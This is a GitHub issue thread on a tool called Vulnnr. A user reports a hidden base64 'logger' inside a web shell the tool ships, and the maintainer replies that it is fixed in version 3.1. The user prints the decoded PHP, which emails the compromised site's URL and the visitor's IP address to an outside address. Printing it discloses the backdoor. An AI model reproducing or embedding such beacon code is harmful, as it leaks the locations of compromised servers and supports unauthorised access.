### ISSUE TITLE
Logger

### ISSUE THREAD

**Issue by TubagusNM** [X-x-X-0/Vulnnr#2]
hello, I found a logger in the Vulnnr.py file line 1137 this logger sends a shell to the email: KeluargaHmei7@yandex.com

this is the base64 decode file:

```
$tujuanmail = 'KeluargaHmei7@yandex.com';
$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
mail($tujuanmail, "Contact Me", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
```

**Comment by X-x-X-0** [comment]
mate, these are not my shells so i had no idea that was there my email is n1337testing@protonmail.com
i will fix this when i push the update

**Comment by X-x-X-0** [comment]
fixed in 3.1 update now
